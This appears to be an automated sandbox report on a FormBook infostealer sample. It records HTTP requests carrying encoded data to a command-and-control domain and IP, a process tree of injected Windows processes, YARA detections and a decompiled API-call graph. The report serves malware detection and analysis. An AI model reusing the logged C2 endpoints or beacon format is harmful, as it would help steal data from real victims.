                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 19:19:10.946492910 CET778OUTPOST /cv1w/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 239
                                                      Host: www.lgdiamonds.info
                                                      Origin: http://www.lgdiamonds.info
                                                      Referer: http://www.lgdiamonds.info/cv1w/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 45 62 71 34 6b 64 3d 48 4b 35 36 44 30 5a 68 2f 66 2b 48 6b 45 2b 63 6c 75 53 2b 63 65 52 47 6c 6f 30 6c 34 57 4a 5a 61 59 55 53 6d 78 71 41 35 6e 74 67 30 30 7a 69 72 51 4d 53 63 34 75 76 43 5a 67 39 58 4a 66 2f 6f 66 36 35 58 4b 51 44 69 38 71 49 70 72 44 78 68 43 62 4e 6a 52 72 7a 61 4c 76 62 53 54 76 64 33 65 36 64 45 55 50 34 2b 51 2f 2f 75 53 4e 61 50 7a 77 41 2b 51 52 73 72 65 78 76 36 2b 48 4b 53 4f 65 48 37 62 59 4b 43 50 37 77 76 69 50 53 78 43 78 6d 30 2b 6b 2b 79 4f 50 75 52 5a 57 54 4a 36 79 78 64 61 79 45 72 62 2b 4f 6a 30 4d 31 79 59 49 79 78 4a 64 35 48 5a 2f 45 37 73 2f 4d 6f 31 7a 34 55 50 35 4e 78 4c 6f 42 38 42 56 67 35 54 59 6e 63 35 2b 46 39 38 45 53 52 50 69 70 33 47 50 4c 71 4e 6b 3d
                                                      Data Ascii: Ebq4kd=HK56D0Zh/f+HkE+cluS+ceRGlo0l4WJZaYUSmxqA5ntg00zirQMSc4uvCZg9XJf/of65XKQDi8qIprDxhCbNjRrzaLvbSTvd3e6dEUP4+Q//uSNaPzwA+QRsrexv6+HKSOeH7bYKCP7wviPSxCxm0+k+yOPuRZWTJ6yxdayErb+Oj0M1yYIyxJd5HZ/E7s/Mo1z4UP5NxLoB8BVg5TYnc5+F98ESRPip3GPLqNk=
                                                      Jan 10, 2025 19:19:11.566744089 CET322INHTTP/1.1 404 Not Found
                                                      Server: nginx/1.6.2
                                                      Date: Fri, 10 Jan 2025 18:19:11 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.754328130.185.109.77806160C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 19:19:13.491508007 CET1791OUTPOST /cv1w/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cache-Control: no-cache
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Content-Length: 1251
                                                      Host: www.lgdiamonds.info
                                                      Origin: http://www.lgdiamonds.info
                                                      Referer: http://www.lgdiamonds.info/cv1w/
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Data Raw: 45 62 71 34 6b 64 3d 48 4b 35 36 44 30 5a 68 2f 66 2b 48 6b 45 2b 63 6c 75 53 2b 63 65 52 47 6c 6f 30 6c 34 57 4a 5a 61 59 55 53 6d 78 71 41 35 6d 56 67 30 6d 4c 69 71 78 4d 53 64 34 75 76 42 5a 68 61 58 4a 65 6e 6f 66 53 39 58 4b 56 34 69 2b 69 49 6d 75 58 78 6f 51 7a 4e 74 52 72 7a 54 72 76 50 57 54 76 49 33 65 71 5a 45 55 66 34 2b 51 2f 2f 75 52 56 61 59 79 77 41 74 67 52 6a 6a 2b 78 64 77 75 48 69 53 4b 7a 6c 37 62 4d 67 43 38 7a 77 75 43 66 53 69 41 70 6d 32 65 6b 38 78 4f 50 6d 52 5a 4b 41 4a 2b 53 4c 64 66 6d 2b 72 63 4b 4f 68 43 70 57 6f 6f 64 75 6e 36 68 6a 4d 2f 6e 46 38 2f 54 73 77 46 79 45 52 74 6f 72 7a 35 41 37 77 68 56 76 39 33 52 5a 42 49 43 78 78 2b 49 6c 65 62 2f 43 73 30 6a 74 70 49 38 77 44 30 71 68 4e 39 55 36 4e 71 53 43 35 58 59 51 67 56 4b 4c 78 33 30 39 48 39 45 42 73 36 35 43 75 50 64 35 56 63 50 47 2b 33 6a 35 64 2b 4f 44 6f 6f 50 6e 6e 54 4a 38 4e 48 6f 37 59 62 72 76 77 51 2f 6f 45 77 6e 63 2b 70 69 44 77 44 79 52 72 37 50 54 38 49 76 38 6c 48 74 4d 45 37 33 61 7a 30 64 [TRUNCATED]
                                                      Data Ascii: Ebq4kd=HK56D0Zh/f+HkE+cluS+ceRGlo0l4WJZaYUSmxqA5mVg0mLiqxMSd4uvBZhaXJenofS9XKV4i+iImuXxoQzNtRrzTrvPWTvI3eqZEUf4+Q//uRVaYywAtgRjj+xdwuHiSKzl7bMgC8zwuCfSiApm2ek8xOPmRZKAJ+SLdfm+rcKOhCpWoodun6hjM/nF8/TswFyERtorz5A7whVv93RZBICxx+Ileb/Cs0jtpI8wD0qhN9U6NqSC5XYQgVKLx309H9EBs65CuPd5VcPG+3j5d+ODooPnnTJ8NHo7YbrvwQ/oEwnc+piDwDyRr7PT8Iv8lHtME73az0dHd4jSqzBCY97DTkEegrHdCL7Urmg6intO6HddWawGUPSNyTbhixMjMHK5mP4Gbdwk+QaNxiYncz45wdMBgiawEeCrfJMDQk1YYnKE01H2nJKAGLGGmGlWLsCSJq2Yw7C9xlZUPOTr+WAvVNYJse2vlMZD9AceBGCoD2lyLGGRRHf0LxVLWb+95rWqoyJ7nfjem5I3sSG8qmJzAGInG1T9IpfE17e1I+krW8h59jKznIeYHvifQfJogt8tsSbPWiPJBwgdGN/lWGdYjQvIdr+qJfaa59NW1yvTSJOPaAyCI+JklmQFKUL8qb+K7Hogr8Ee5eyoZJZq25+HKfmaIZk2SkeGIBujL6op5JO1+fxVb7fs15qA2ddi5JV0pfc38+oSYBiA/S1iv7uvwUwhrNG9C7T13WqgfJT5WptImVAl6rsnegCkOQ7cF8OESxR2WVkK6Mk4k7ay77cqCkIH7GDZ2gYP9wNdTiuqmKQyoVe2oe5ypKsrNZCRRurrITaAPr8+KH95DkNV0Tbygdtxl8bDBQFSYR2ZXHS9XPqYPHg9bXBO6OG66fHRTG+gDjvrzliwsPbskrOlDd1ruAZ5AFhXdU7ixKi1TzTA202B8PV0q9D09IV6LihV+zz9YCKbK8YcxW4uJhWZb0IbPNxshkxGvt4pFI+DLw6La [TRUNCATED]
                                                      Jan 10, 2025 19:19:14.114927053 CET322INHTTP/1.1 404 Not Found
                                                      Server: nginx/1.6.2
                                                      Date: Fri, 10 Jan 2025 18:19:14 GMT
                                                      Content-Type: text/html
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Content-Encoding: gzip
                                                      Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 83(HML),I310Q/Qp/K&T*$'*gd*HN+I-0D7(bTgU!2S>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.754329130.185.109.77806160C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jan 10, 2025 19:19:16.038676977 CET488OUTGET /cv1w/?Ebq4kd=KIRaABhBgujzn3KWmND9cpAT+69hyUlHf/kT3kOA8kciiH38vV9KVMyDNvMwVI643JmGXckFkIiptpvhjjDetRqgMb6LfgDY9OvnJHDjkSrllgUtIBAwrRtYgMla7fjjdtGa4rVNLvrP&zNH=npZPFHp HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.lgdiamonds.info
                                                      User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                      Jan 10, 2025 19:19:16.649893045 CET317INHTTP/1.1 404 Not Found
                                                      Server: nginx/1.6.2
                                                      Date: Fri, 10 Jan 2025 18:19:16 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 168
                                                      Connection: close
                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:1
                                                      Start time:13:17:09
                                                      Start date:10/01/2025
                                                      Path:C:\Users\user\Desktop\cNDddMAF5u.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\cNDddMAF5u.exe"
                                                      Imagebase:0x6a0000
                                                      File size:1'266'176 bytes
                                                      MD5 hash:CAF89165D3DFDDE3273CCE4DEADE7DB4
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:3
                                                      Start time:13:17:12
                                                      Start date:10/01/2025
                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\cNDddMAF5u.exe"
                                                      Imagebase:0x5d0000
                                                      File size:46'504 bytes
                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1703918121.0000000006920000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1701029410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1702227169.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:5
                                                      Start time:15:08:18
                                                      Start date:10/01/2025
                                                      Path:C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe"
                                                      Imagebase:0x190000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2585572364.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:6
                                                      Start time:15:08:19
                                                      Start date:10/01/2025
                                                      Path:C:\Windows\SysWOW64\rasdial.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\rasdial.exe"
                                                      Imagebase:0xa50000
                                                      File size:19'456 bytes
                                                      MD5 hash:A280B0F42A83064C41CFFDC1CD35136E
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2581837610.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2585563480.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2585328157.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:7
                                                      Start time:15:08:33
                                                      Start date:10/01/2025
                                                      Path:C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe"
                                                      Imagebase:0x190000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2587932076.0000000005510000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:11
                                                      Start time:15:08:45
                                                      Start date:10/01/2025
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff722870000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:3.1%
                                                        Dynamic/Decrypted Code Coverage:1%
                                                        Signature Coverage:5.1%
                                                        Total number of Nodes:1821
                                                        Total number of Limit Nodes:43
                                                        execution_graph 95688 16d5268 95702 16d2eb8 95688->95702 95690 16d52e9 95705 16d5158 95690->95705 95692 16d5312 CreateFileW 95694 16d5366 95692->95694 95696 16d5361 95692->95696 95695 16d537d VirtualAlloc 95694->95695 95694->95696 95695->95696 95697 16d539b ReadFile 95695->95697 95697->95696 95698 16d53b6 95697->95698 95699 16d4158 13 API calls 95698->95699 95700 16d53e9 95699->95700 95701 16d540c ExitProcess 95700->95701 95701->95696 95708 16d6318 GetPEB 95702->95708 95704 16d3543 95704->95690 95706 16d5161 Sleep 95705->95706 95707 16d516f 95706->95707 95709 16d6342 95708->95709 95709->95704 95710 6a1cad SystemParametersInfoW 95711 6a2de3 95712 6a2df0 __wsopen_s 95711->95712 95713 6a2e09 95712->95713 95714 6e2c2b ___scrt_fastfail 95712->95714 95727 6a3aa2 95713->95727 95717 6e2c47 GetOpenFileNameW 95714->95717 95719 6e2c96 95717->95719 95785 6a6b57 95719->95785 95722 6e2cab 95722->95722 95724 6a2e27 95755 6a44a8 95724->95755 95797 6e1f50 95727->95797 95730 6a3ae9 95803 6aa6c3 95730->95803 95731 6a3ace 95732 6a6b57 22 API calls 95731->95732 95734 6a3ada 95732->95734 95799 6a37a0 95734->95799 95737 6a2da5 95738 6e1f50 __wsopen_s 95737->95738 95739 6a2db2 GetLongPathNameW 95738->95739 95740 6a6b57 22 API calls 95739->95740 95741 6a2dda 95740->95741 95742 6a3598 95741->95742 95854 6aa961 95742->95854 95745 6a3aa2 23 API calls 95746 6a35b5 95745->95746 95747 6a35c0 95746->95747 95751 6e32eb 95746->95751 95859 6a515f 95747->95859 95753 6e330d 95751->95753 95871 6bce60 41 API calls 95751->95871 95754 6a35df 95754->95724 95872 6a4ecb 95755->95872 95758 6e3833 95894 712cf9 95758->95894 95759 6a4ecb 94 API calls 95761 6a44e1 95759->95761 95761->95758 95765 6a44e9 95761->95765 95762 6e3848 95763 6e384c 95762->95763 95764 6e3869 95762->95764 95935 6a4f39 95763->95935 95767 6bfe0b 22 API calls 95764->95767 95768 6e3854 95765->95768 95769 6a44f5 95765->95769 95776 6e38ae 95767->95776 95941 70da5a 82 API calls 95768->95941 95934 6a940c 136 API calls 2 library calls 95769->95934 95772 6e3862 95772->95764 95773 6a2e31 95774 6e3a5f 95780 6e3a67 95774->95780 95775 6a4f39 68 API calls 95775->95780 95776->95774 95776->95780 95782 6a9cb3 22 API calls 95776->95782 95920 6aa4a1 95776->95920 95928 6a3ff7 95776->95928 95942 70967e 22 API calls __fread_nolock 95776->95942 95943 7095ad 42 API calls _wcslen 95776->95943 95944 710b5a 22 API calls 95776->95944 95780->95775 95945 70989b 82 API calls __wsopen_s 95780->95945 95782->95776 95786 6a6b67 _wcslen 95785->95786 95787 6e4ba1 95785->95787 95790 6a6b7d 95786->95790 95791 6a6ba2 95786->95791 95788 6a93b2 22 API calls 95787->95788 95789 6e4baa 95788->95789 95789->95789 96384 6a6f34 95790->96384 95793 6bfddb 22 API calls 95791->95793 95795 6a6bae 95793->95795 95794 6a6b85 __fread_nolock 95794->95722 95796 6bfe0b 22 API calls 95795->95796 95796->95794 95798 6a3aaf GetFullPathNameW 95797->95798 95798->95730 95798->95731 95800 6a37ae 95799->95800 95809 6a93b2 95800->95809 95802 6a2e12 95802->95737 95804 6aa6dd 95803->95804 95808 6aa6d0 95803->95808 95805 6bfddb 22 API calls 95804->95805 95806 6aa6e7 95805->95806 95807 6bfe0b 22 API calls 95806->95807 95807->95808 95808->95734 95810 6a93c0 95809->95810 95812 6a93c9 __fread_nolock 95809->95812 95810->95812 95813 6aaec9 95810->95813 95812->95802 95814 6aaedc 95813->95814 95818 6aaed9 __fread_nolock 95813->95818 95819 6bfddb 95814->95819 95816 6aaee7 95829 6bfe0b 95816->95829 95818->95812 95822 6bfde0 95819->95822 95821 6bfdfa 95821->95816 95822->95821 95825 6bfdfc 95822->95825 95839 6cea0c 95822->95839 95846 6c4ead 7 API calls 2 library calls 95822->95846 95824 6c066d 95848 6c32a4 RaiseException 95824->95848 95825->95824 95847 6c32a4 RaiseException 95825->95847 95828 6c068a 95828->95816 95831 6bfddb 95829->95831 95830 6cea0c ___std_exception_copy 21 API calls 95830->95831 95831->95830 95832 6bfdfa 95831->95832 95835 6bfdfc 95831->95835 95851 6c4ead 7 API calls 2 library calls 95831->95851 95832->95818 95834 6c066d 95853 6c32a4 RaiseException 95834->95853 95835->95834 95852 6c32a4 RaiseException 95835->95852 95838 6c068a 95838->95818 95841 6d3820 _abort 95839->95841 95840 6d385e 95850 6cf2d9 20 API calls _abort 95840->95850 95841->95840 95843 6d3849 RtlAllocateHeap 95841->95843 95849 6c4ead 7 API calls 2 library calls 95841->95849 95843->95841 95844 6d385c 95843->95844 95844->95822 95846->95822 95847->95824 95848->95828 95849->95841 95850->95844 95851->95831 95852->95834 95853->95838 95855 6bfe0b 22 API calls 95854->95855 95856 6aa976 95855->95856 95857 6bfddb 22 API calls 95856->95857 95858 6a35aa 95857->95858 95858->95745 95860 6a516e 95859->95860 95864 6a518f __fread_nolock 95859->95864 95862 6bfe0b 22 API calls 95860->95862 95861 6bfddb 22 API calls 95863 6a35cc 95861->95863 95862->95864 95865 6a35f3 95863->95865 95864->95861 95866 6a3605 95865->95866 95870 6a3624 __fread_nolock 95865->95870 95868 6bfe0b 22 API calls 95866->95868 95867 6bfddb 22 API calls 95869 6a363b 95867->95869 95868->95870 95869->95754 95870->95867 95871->95751 95946 6a4e90 LoadLibraryA 95872->95946 95877 6e3ccf 95879 6a4f39 68 API calls 95877->95879 95878 6a4ef6 LoadLibraryExW 95954 6a4e59 LoadLibraryA 95878->95954 95881 6e3cd6 95879->95881 95883 6a4e59 3 API calls 95881->95883 95885 6e3cde 95883->95885 95976 6a50f5 95885->95976 95886 6a4f20 95886->95885 95887 6a4f2c 95886->95887 95889 6a4f39 68 API calls 95887->95889 95891 6a44cd 95889->95891 95891->95758 95891->95759 95893 6e3d05 95895 712d15 95894->95895 95896 6a511f 64 API calls 95895->95896 95897 712d29 95896->95897 96119 712e66 95897->96119 95900 712d3f 95900->95762 95901 6a50f5 40 API calls 95902 712d56 95901->95902 95903 6a50f5 40 API calls 95902->95903 95904 712d66 95903->95904 95905 6a50f5 40 API calls 95904->95905 95906 712d81 95905->95906 95907 6a50f5 40 API calls 95906->95907 95908 712d9c 95907->95908 95909 6a511f 64 API calls 95908->95909 95910 712db3 95909->95910 95911 6cea0c ___std_exception_copy 21 API calls 95910->95911 95912 712dba 95911->95912 95913 6cea0c ___std_exception_copy 21 API calls 95912->95913 95914 712dc4 95913->95914 95915 6a50f5 40 API calls 95914->95915 95916 712dd8 95915->95916 95917 7128fe 27 API calls 95916->95917 95918 712dee 95917->95918 95918->95900 96125 7122ce 79 API calls 95918->96125 95921 6aa52b 95920->95921 95926 6aa4b1 __fread_nolock 95920->95926 95923 6bfe0b 22 API calls 95921->95923 95922 6bfddb 22 API calls 95924 6aa4b8 95922->95924 95923->95926 95925 6bfddb 22 API calls 95924->95925 95927 6aa4d6 95924->95927 95925->95927 95926->95922 95927->95776 95929 6a400a 95928->95929 95932 6a40ae 95928->95932 95930 6bfe0b 22 API calls 95929->95930 95933 6a403c 95929->95933 95930->95933 95931 6bfddb 22 API calls 95931->95933 95932->95776 95933->95931 95933->95932 95934->95773 95936 6a4f43 95935->95936 95938 6a4f4a 95935->95938 96126 6ce678 95936->96126 95939 6a4f6a FreeLibrary 95938->95939 95940 6a4f59 95938->95940 95939->95940 95940->95768 95941->95772 95942->95776 95943->95776 95944->95776 95945->95780 95947 6a4ea8 GetProcAddress 95946->95947 95948 6a4ec6 95946->95948 95949 6a4eb8 95947->95949 95951 6ce5eb 95948->95951 95949->95948 95950 6a4ebf FreeLibrary 95949->95950 95950->95948 95984 6ce52a 95951->95984 95953 6a4eea 95953->95877 95953->95878 95955 6a4e6e GetProcAddress 95954->95955 95956 6a4e8d 95954->95956 95957 6a4e7e 95955->95957 95959 6a4f80 95956->95959 95957->95956 95958 6a4e86 FreeLibrary 95957->95958 95958->95956 95960 6bfe0b 22 API calls 95959->95960 95961 6a4f95 95960->95961 96045 6a5722 95961->96045 95963 6a4fa1 __fread_nolock 95964 6e3d1d 95963->95964 95965 6a50a5 95963->95965 95975 6a4fdc 95963->95975 96059 71304d 74 API calls 95964->96059 96048 6a42a2 CreateStreamOnHGlobal 95965->96048 95968 6e3d22 95970 6a511f 64 API calls 95968->95970 95969 6a50f5 40 API calls 95969->95975 95971 6e3d45 95970->95971 95972 6a50f5 40 API calls 95971->95972 95973 6a506e messages 95972->95973 95973->95886 95975->95968 95975->95969 95975->95973 96054 6a511f 95975->96054 95977 6a5107 95976->95977 95978 6e3d70 95976->95978 96081 6ce8c4 95977->96081 95981 7128fe 96102 71274e 95981->96102 95983 712919 95983->95893 95987 6ce536 BuildCatchObjectHelperInternal 95984->95987 95985 6ce544 96009 6cf2d9 20 API calls _abort 95985->96009 95987->95985 95989 6ce574 95987->95989 95988 6ce549 96010 6d27ec 26 API calls _strftime 95988->96010 95991 6ce579 95989->95991 95992 6ce586 95989->95992 96011 6cf2d9 20 API calls _abort 95991->96011 96001 6d8061 95992->96001 95995 6ce58f 95997 6ce595 95995->95997 95999 6ce5a2 95995->95999 95996 6ce554 __wsopen_s 95996->95953 96012 6cf2d9 20 API calls _abort 95997->96012 96013 6ce5d4 LeaveCriticalSection __fread_nolock 95999->96013 96002 6d806d BuildCatchObjectHelperInternal 96001->96002 96014 6d2f5e EnterCriticalSection 96002->96014 96004 6d807b 96015 6d80fb 96004->96015 96008 6d80ac __wsopen_s 96008->95995 96009->95988 96010->95996 96011->95996 96012->95996 96013->95996 96014->96004 96023 6d811e 96015->96023 96016 6d8088 96029 6d80b7 96016->96029 96017 6d8177 96034 6d4c7d 20 API calls 2 library calls 96017->96034 96020 6d8180 96035 6d29c8 96020->96035 96022 6d8189 96022->96016 96041 6d3405 11 API calls 2 library calls 96022->96041 96023->96016 96023->96017 96023->96023 96032 6c918d EnterCriticalSection 96023->96032 96033 6c91a1 LeaveCriticalSection 96023->96033 96025 6d81a8 96042 6c918d EnterCriticalSection 96025->96042 96028 6d81bb 96028->96016 96044 6d2fa6 LeaveCriticalSection 96029->96044 96031 6d80be 96031->96008 96032->96023 96033->96023 96034->96020 96036 6d29d3 RtlFreeHeap 96035->96036 96040 6d29fc _free 96035->96040 96037 6d29e8 96036->96037 96036->96040 96043 6cf2d9 20 API calls _abort 96037->96043 96039 6d29ee GetLastError 96039->96040 96040->96022 96041->96025 96042->96028 96043->96039 96044->96031 96046 6bfddb 22 API calls 96045->96046 96047 6a5734 96046->96047 96047->95963 96049 6a42bc FindResourceExW 96048->96049 96050 6a42d9 96048->96050 96049->96050 96051 6e35ba LoadResource 96049->96051 96050->95975 96051->96050 96052 6e35cf SizeofResource 96051->96052 96052->96050 96053 6e35e3 LockResource 96052->96053 96053->96050 96055 6a512e 96054->96055 96056 6e3d90 96054->96056 96060 6cece3 96055->96060 96059->95968 96063 6ceaaa 96060->96063 96062 6a513c 96062->95975 96065 6ceab6 BuildCatchObjectHelperInternal 96063->96065 96064 6ceac2 96076 6cf2d9 20 API calls _abort 96064->96076 96065->96064 96066 6ceae8 96065->96066 96078 6c918d EnterCriticalSection 96066->96078 96069 6ceac7 96077 6d27ec 26 API calls _strftime 96069->96077 96070 6ceaf4 96079 6cec0a 62 API calls 2 library calls 96070->96079 96073 6ceb08 96080 6ceb27 LeaveCriticalSection __fread_nolock 96073->96080 96075 6cead2 __wsopen_s 96075->96062 96076->96069 96077->96075 96078->96070 96079->96073 96080->96075 96084 6ce8e1 96081->96084 96083 6a5118 96083->95981 96085 6ce8ed BuildCatchObjectHelperInternal 96084->96085 96086 6ce92d 96085->96086 96087 6ce925 __wsopen_s 96085->96087 96091 6ce900 ___scrt_fastfail 96085->96091 96099 6c918d EnterCriticalSection 96086->96099 96087->96083 96090 6ce937 96100 6ce6f8 38 API calls 4 library calls 96090->96100 96097 6cf2d9 20 API calls _abort 96091->96097 96092 6ce91a 96098 6d27ec 26 API calls _strftime 96092->96098 96094 6ce94e 96101 6ce96c LeaveCriticalSection __fread_nolock 96094->96101 96097->96092 96098->96087 96099->96090 96100->96094 96101->96087 96105 6ce4e8 96102->96105 96104 71275d 96104->95983 96108 6ce469 96105->96108 96107 6ce505 96107->96104 96109 6ce478 96108->96109 96110 6ce48c 96108->96110 96116 6cf2d9 20 API calls _abort 96109->96116 96114 6ce488 __alldvrm 96110->96114 96118 6d333f 11 API calls 2 library calls 96110->96118 96113 6ce47d 96117 6d27ec 26 API calls _strftime 96113->96117 96114->96107 96116->96113 96117->96114 96118->96114 96121 712e7a 96119->96121 96120 6a50f5 40 API calls 96120->96121 96121->96120 96122 7128fe 27 API calls 96121->96122 96123 712d3b 96121->96123 96124 6a511f 64 API calls 96121->96124 96122->96121 96123->95900 96123->95901 96124->96121 96125->95900 96127 6ce684 BuildCatchObjectHelperInternal 96126->96127 